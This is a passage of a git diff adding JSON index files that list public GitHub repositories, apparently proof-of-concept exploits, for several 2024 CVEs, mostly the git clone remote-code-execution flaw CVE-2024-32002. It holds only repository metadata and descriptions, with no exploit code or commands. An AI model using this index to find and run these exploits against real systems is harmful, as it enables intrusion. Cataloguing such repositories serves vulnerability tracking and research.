"WOOOOONG\/CVE-2024-32002", + "owner": { + "login": "WOOOOONG", + "id": 40143329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4", + "html_url": "https:\/\/github.com\/WOOOOONG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WOOOOONG\/CVE-2024-32002", + "description": "PoC Exploit for CVE-2024-32002", + "fork": false, + "created_at": "2024-05-23T06:38:34Z", + "updated_at": "2024-05-23T06:55:05Z", + "pushed_at": "2024-05-23T06:55:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804727245, + "name": "hook", + "full_name": "WOOOOONG\/hook", + "owner": { + "login": "WOOOOONG", + "id": 40143329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4", + "html_url": "https:\/\/github.com\/WOOOOONG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WOOOOONG\/hook", + "description": "PoC Exploit for CVE-2024-32002", + "fork": false, + "created_at": "2024-05-23T06:38:56Z", + "updated_at": "2024-05-23T06:54:49Z", + "pushed_at": "2024-05-23T06:54:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804756776, + "name": "poc-cve-2024-32002", + "full_name": "fadhilthomas\/poc-cve-2024-32002", + "owner": { + "login": "fadhilthomas", + "id": 29804796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29804796?v=4", + "html_url": "https:\/\/github.com\/fadhilthomas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fadhilthomas\/poc-cve-2024-32002", + "description": "poc of git rce using cve-2024-32002", + "fork": false, + "created_at": "2024-05-23T07:56:05Z", + "updated_at": "2024-05-26T19:44:08Z", + "pushed_at": "2024-05-24T10:39:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-32002", + "git", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805294860, + "name": "hook", + "full_name": "fadhilthomas\/hook", + "owner": { + "login": "fadhilthomas", + "id": 29804796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29804796?v=4", + "html_url": "https:\/\/github.com\/fadhilthomas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fadhilthomas\/hook", + "description": "part of poc cve-2024-32002", + "fork": false, + "created_at": "2024-05-24T09:23:42Z", + "updated_at": "2024-05-24T11:10:46Z", + "pushed_at": "2024-05-24T10:05:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-32002", + "git", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805740767, + "name": "cve-2024-32002-submodule-aw", + "full_name": "JakobTheDev\/cve-2024-32002-submodule-aw", + "owner": { + "login": "JakobTheDev", + "id": 21337744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4", + "html_url": "https:\/\/github.com\/JakobTheDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-submodule-aw", + "description": "A submodule to demonstrate CVE-2024-32002. Demonstrates arbitrary write into .git.", + "fork": false, + "created_at": "2024-05-25T10:29:13Z", + "updated_at": "2024-05-25T12:20:27Z", + "pushed_at": "2024-05-25T12:08:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805741257, + "name": "cve-2024-32002-poc-aw", + "full_name": "JakobTheDev\/cve-2024-32002-poc-aw", + "owner": { + "login": "JakobTheDev", + "id": 21337744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4", + "html_url": "https:\/\/github.com\/JakobTheDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-poc-aw", + "description": "A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.", + "fork": false, + "created_at": "2024-05-25T10:30:57Z", + "updated_at": "2024-05-25T12:20:17Z", + "pushed_at": "2024-05-25T12:14:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806888145, + "name": "CVE-2024-32002-git-rce", + "full_name": "Goplush\/CVE-2024-32002-git-rce", + "owner": { + "login": "Goplush", + "id": 81841745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81841745?v=4", + "html_url": "https:\/\/github.com\/Goplush", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Goplush\/CVE-2024-32002-git-rce", + "description": null, + "fork": false, + "created_at": "2024-05-28T05:27:23Z", + "updated_at": "2024-06-01T06:27:38Z", + "pushed_at": "2024-05-28T07:41:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807969410, + "name": "rcetest", + "full_name": "431m\/rcetest", + "owner": { + "login": "431m", + "id": 71336091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71336091?v=4", + "html_url": "https:\/\/github.com\/431m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/431m\/rcetest", + "description": "CVE-2024-32002 poc test", + "fork": false, + "created_at": "2024-05-30T06:08:33Z", + "updated_at": "2024-06-03T04:13:19Z", + "pushed_at": "2024-05-30T06:17:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808410272, + "name": "CVE-2024-32002", + "full_name": "AD-Appledog\/CVE-2024-32002", + "owner": { + "login": "AD-Appledog", + "id": 94734520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94734520?v=4", + "html_url": "https:\/\/github.com\/AD-Appledog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AD-Appledog\/CVE-2024-32002", + "description": "CVE-2024-32002wakuwaku", + "fork": false, + "created_at": "2024-05-31T02:40:31Z", + "updated_at": "2024-05-31T02:54:23Z", + "pushed_at": "2024-05-31T02:54:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808411710, + "name": "wakuwaku", + "full_name": "AD-Appledog\/wakuwaku", + "owner": { + "login": "AD-Appledog", + "id": 94734520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94734520?v=4", + "html_url": "https:\/\/github.com\/AD-Appledog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AD-Appledog\/wakuwaku", + "description": "cve-2024-32002yahhh", + "fork": false, + "created_at": "2024-05-31T02:45:44Z", + "updated_at": "2024-09-06T08:37:09Z", + "pushed_at": "2024-09-06T08:37:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809009313, + "name": "cve_2024_32002", + "full_name": "tobelight\/cve_2024_32002", + "owner": { + "login": "tobelight", + "id": 131186949, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131186949?v=4", + "html_url": "https:\/\/github.com\/tobelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tobelight\/cve_2024_32002", + "description": "https:\/\/www.cve.org\/CVERecord?id=CVE-2024-32002", + "fork": false, + "created_at": "2024-06-01T12:27:50Z", + "updated_at": "2024-06-01T12:30:39Z", + "pushed_at": "2024-06-01T12:30:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809142955, + "name": "CVE-2024-32002-PoC_Chinese", + "full_name": "Basyaact\/CVE-2024-32002-PoC_Chinese", + "owner": { + "login": "Basyaact", + "id": 49944732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49944732?v=4", + "html_url": "https:\/\/github.com\/Basyaact", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Basyaact\/CVE-2024-32002-PoC_Chinese", + "description": "none", + "fork": false, + "created_at": "2024-06-01T20:19:05Z", + "updated_at": "2024-09-05T11:14:54Z", + "pushed_at": "2024-06-05T20:10:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823532806, + "name": "git_rce", + "full_name": "EQSTLab\/git_rce", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/git_rce", + "description": "git clone rce CVE-2024-32002", + "fork": false, + "created_at": "2024-07-03T08:01:39Z", + "updated_at": "2024-10-31T20:50:27Z", + "pushed_at": "2024-07-09T01:52:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825352916, + "name": "CVE-2024-32002-hook", + "full_name": "sysonlai\/CVE-2024-32002-hook", + "owner": { + "login": "sysonlai", + "id": 23263310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23263310?v=4", + "html_url": "https:\/\/github.com\/sysonlai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sysonlai\/CVE-2024-32002-hook", + "description": null, + "fork": false, + "created_at": "2024-07-07T14:50:23Z", + "updated_at": "2024-07-07T15:06:42Z", + "pushed_at": "2024-07-07T15:06:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831254914, + "name": "CVE-2024-32002-git-rce-father-poc", + "full_name": "TSY244\/CVE-2024-32002-git-rce-father-poc", + "owner": { + "login": "TSY244", + "id": 115205751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115205751?v=4", + "html_url": "https:\/\/github.com\/TSY244", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TSY244\/CVE-2024-32002-git-rce-father-poc", + "description": null, + "fork": false, + "created_at": "2024-07-20T03:59:35Z", + "updated_at": "2024-07-20T03:59:43Z", + "pushed_at": "2024-07-20T03:59:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831261401, + "name": "CVE-2024-32002-git-rce", + "full_name": "TSY244\/CVE-2024-32002-git-rce", + "owner": { + "login": "TSY244", + "id": 115205751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115205751?v=4", + "html_url": "https:\/\/github.com\/TSY244", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TSY244\/CVE-2024-32002-git-rce", + "description": null, + "fork": false, + "created_at": "2024-07-20T04:31:26Z", + "updated_at": "2024-07-20T04:31:34Z", + "pushed_at": "2024-07-20T04:31:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834651199, + "name": "CVE-2024-32002", + "full_name": "blackninja23\/CVE-2024-32002", + "owner": { + "login": "blackninja23", + "id": 78839207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78839207?v=4", + "html_url": "https:\/\/github.com\/blackninja23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blackninja23\/CVE-2024-32002", + "description": null, + "fork": false, + "created_at": "2024-07-27T23:44:25Z", + "updated_at": "2024-07-27T23:56:40Z", + "pushed_at": "2024-07-27T23:56:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834840343, + "name": "CVE-2024-32002", + "full_name": "daemon-reconfig\/CVE-2024-32002", + "owner": { + "login": "daemon-reconfig", + "id": 69844188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69844188?v=4", + "html_url": "https:\/\/github.com\/daemon-reconfig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daemon-reconfig\/CVE-2024-32002", + "description": "A Reverse shell generator for gitlab-shell vulnerability cve 2024-32002", + "fork": false, + "created_at": "2024-07-28T14:22:01Z", + "updated_at": "2024-08-02T09:25:53Z", + "pushed_at": "2024-08-02T09:25:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835173287, + "name": "CVE-2024-32002", + "full_name": "charlesgargasson\/CVE-2024-32002", + "owner": { + "login": "charlesgargasson", + "id": 26895987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895987?v=4", + "html_url": "https:\/\/github.com\/charlesgargasson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesgargasson\/CVE-2024-32002", + "description": "GIT RCE CVE-2024-32002", + "fork": false, + "created_at": "2024-07-29T10:00:41Z", + "updated_at": "2024-11-16T10:58:35Z", + "pushed_at": "2024-07-30T23:27:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-32002", + "exploit", + "htb", + "linux", + "poc", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835802048, + "name": "CVE-2024-32002-PoC", + "full_name": "NishanthAnand21\/CVE-2024-32002-PoC", + "owner": { + "login": "NishanthAnand21", + "id": 87749392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87749392?v=4", + "html_url": "https:\/\/github.com\/NishanthAnand21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NishanthAnand21\/CVE-2024-32002-PoC", + "description": "PoC of CVE-2024-32002 - Remote Code Execution while cloning special-crafted local repositories", + "fork": false, + "created_at": "2024-07-30T14:58:00Z", + "updated_at": "2024-12-24T09:45:12Z", + "pushed_at": "2024-07-30T16:01:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835952440, + "name": "CVE-2024-32002", + "full_name": "FlojBoj\/CVE-2024-32002", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2024-32002", + "description": null, + "fork": false, + "created_at": "2024-07-30T21:22:29Z", + "updated_at": "2024-09-02T15:21:46Z", + "pushed_at": "2024-09-02T15:21:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835980205, + "name": "CVE-2024-32002", + "full_name": "SpycioKon\/CVE-2024-32002", + "owner": { + "login": "SpycioKon", + "id": 77606941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77606941?v=4", + "html_url": "https:\/\/github.com\/SpycioKon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpycioKon\/CVE-2024-32002", + "description": "Just small script to exploit CVE-2024-32002", + "fork": false, + "created_at": "2024-07-30T23:20:51Z", + "updated_at": "2024-07-30T23:26:17Z", + "pushed_at": "2024-07-30T23:26:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 837343866, + "name": "running-CVE-2024-32002-locally-for-tesing", + "full_name": "chrisWalker11\/running-CVE-2024-32002-locally-for-tesing", + "owner": { + "login": "chrisWalker11", + "id": 51098965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51098965?v=4", + "html_url": "https:\/\/github.com\/chrisWalker11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chrisWalker11\/running-CVE-2024-32002-locally-for-tesing", + "description": "adapting CVE-2024-32002 for running offline and locally", + "fork": false, + "created_at": "2024-08-02T18:44:00Z", + "updated_at": "2024-08-04T17:39:52Z", + "pushed_at": "2024-08-04T17:38:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843863510, + "name": "CVE-2024-32002", + "full_name": "sanan2004\/CVE-2024-32002", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2024-32002", + "description": "POC", + "fork": false, + "created_at": "2024-08-17T16:43:26Z", + "updated_at": "2024-08-21T10:04:48Z", + "pushed_at": "2024-08-17T16:46:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863849686, + "name": "hook", + "full_name": "Masamuneee\/hook", + "owner": { + "login": "Masamuneee", + "id": 125840508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125840508?v=4", + "html_url": "https:\/\/github.com\/Masamuneee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Masamuneee\/hook", + "description": "This is a demo for CVE-2024-32002 POC", + "fork": false, + "created_at": "2024-09-27T03:09:18Z", + "updated_at": "2024-09-27T03:34:34Z", + "pushed_at": "2024-09-27T03:34:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863849901, + "name": "CVE-2024-32002-POC", + "full_name": "Masamuneee\/CVE-2024-32002-POC", + "owner": { + "login": "Masamuneee", + "id": 125840508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125840508?v=4", + "html_url": "https:\/\/github.com\/Masamuneee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Masamuneee\/CVE-2024-32002-POC", + "description": "This is a demo for CVE-2024-32002 POC", + "fork": false, + "created_at": "2024-09-27T03:10:04Z", + "updated_at": "2024-09-27T07:08:17Z", + "pushed_at": "2024-09-27T07:08:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863854967, + "name": "CVE-2024-32002-PoC", + "full_name": "th4s1s\/CVE-2024-32002-PoC", + "owner": { + "login": "th4s1s", + "id": 102442488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102442488?v=4", + "html_url": "https:\/\/github.com\/th4s1s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th4s1s\/CVE-2024-32002-PoC", + "description": "Proof of Concept for CVE-2024-32002", + "fork": false, + "created_at": "2024-09-27T03:29:15Z", + "updated_at": "2024-12-17T10:04:35Z", + "pushed_at": "2024-09-27T03:30:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869470523, + "name": "hook_CVE-2024-32002", + "full_name": "Julian-gmz\/hook_CVE-2024-32002", + "owner": { + "login": "Julian-gmz", + "id": 77108278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77108278?v=4", + "html_url": "https:\/\/github.com\/Julian-gmz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Julian-gmz\/hook_CVE-2024-32002", + "description": "hihihihaa", + "fork": false, + "created_at": "2024-10-08T10:57:17Z", + "updated_at": "2024-12-04T16:21:49Z", + "pushed_at": "2024-12-04T16:21:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 876714741, + "name": "CVE-2024-32002", + "full_name": "grecosamuel\/CVE-2024-32002", + "owner": { + "login": "grecosamuel", + "id": 97310811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97310811?v=4", + "html_url": "https:\/\/github.com\/grecosamuel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grecosamuel\/CVE-2024-32002", + "description": null, + "fork": false, + "created_at": "2024-10-22T12:44:44Z", + "updated_at": "2024-12-10T13:26:47Z", + "pushed_at": "2024-11-25T10:35:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892923707, + "name": "cve-2024-32002-poc", + "full_name": "XiaomingX\/cve-2024-32002-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-32002-poc", + "description": "CVE-2024-32002 是 Git 中的一个严重漏洞,允许攻击者在用户执行 git clone 操作时远程执行任意代码(RCE)。", + "fork": false, + "created_at": "2024-11-23T04:06:33Z", + "updated_at": "2024-12-08T18:37:03Z", + "pushed_at": "2024-11-23T04:07:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 901717526, + "name": "donald", + "full_name": "jolibb55\/donald", + "owner": { + "login": "jolibb55", + "id": 183569041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/183569041?v=4", + "html_url": "https:\/\/github.com\/jolibb55", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jolibb55\/donald", + "description": "An example of a repo that would make use of the CVE-2024-32002", + "fork": false, + "created_at": "2024-12-11T07:22:59Z", + "updated_at": "2024-12-11T08:44:17Z", + "pushed_at": "2024-12-11T07:22:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32004.json b/2024/CVE-2024-32004.json new file mode 100644 index 0000000000..ece0784ad5 --- /dev/null +++ b/2024/CVE-2024-32004.json @@ -0,0 +1,64 @@ +[ + { + "id": 802872644, + "name": "CVE-2024-32004", + "full_name": "Wadewfsssss\/CVE-2024-32004", + "owner": { + "login": "Wadewfsssss", + "id": 48876891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48876891?v=4", + "html_url": "https:\/\/github.com\/Wadewfsssss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wadewfsssss\/CVE-2024-32004", + "description": null, + "fork": false, + "created_at": "2024-05-19T13:57:46Z", + "updated_at": "2024-05-20T06:16:40Z", + "pushed_at": "2024-05-20T06:16:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803351666, + "name": "CVE-2024-32004-POC", + "full_name": "10cks\/CVE-2024-32004-POC", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32004-POC", + "description": null, + "fork": false, + "created_at": "2024-05-20T14:59:16Z", + "updated_at": "2024-05-20T15:02:51Z", + "pushed_at": "2024-05-20T15:02:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32030.json b/2024/CVE-2024-32030.json new file mode 100644 index 0000000000..97facc990a --- /dev/null +++ b/2024/CVE-2024-32030.json @@ -0,0 +1,33 @@ +[ + { + "id": 819385498, + "name": "CVE-2024-32030-Nuclei-Template", + "full_name": "huseyinstif\/CVE-2024-32030-Nuclei-Template", + "owner": { + "login": "huseyinstif", + "id": 54823077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4", + "html_url": "https:\/\/github.com\/huseyinstif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-32030-Nuclei-Template", + "description": null, + "fork": false, + "created_at": "2024-06-24T11:57:26Z", + "updated_at": "2024-06-24T11:57:31Z", + "pushed_at": "2024-06-24T11:57:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32104.json b/2024/CVE-2024-32104.json new file mode 100644 index 0000000000..c954d84830 --- /dev/null +++ b/2024/CVE-2024-32104.json @@ -0,0 +1,33 @@ +[ + { + "id": 836230704, + "name": "CVE-2024-32104", + "full_name": "Cerberus-HiproPlus\/CVE-2024-32104", + "owner": { + "login": "Cerberus-HiproPlus", + "id": 176384180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176384180?v=4", + "html_url": "https:\/\/github.com\/Cerberus-HiproPlus", + "user_view_type": "public" + }, + "html_url": 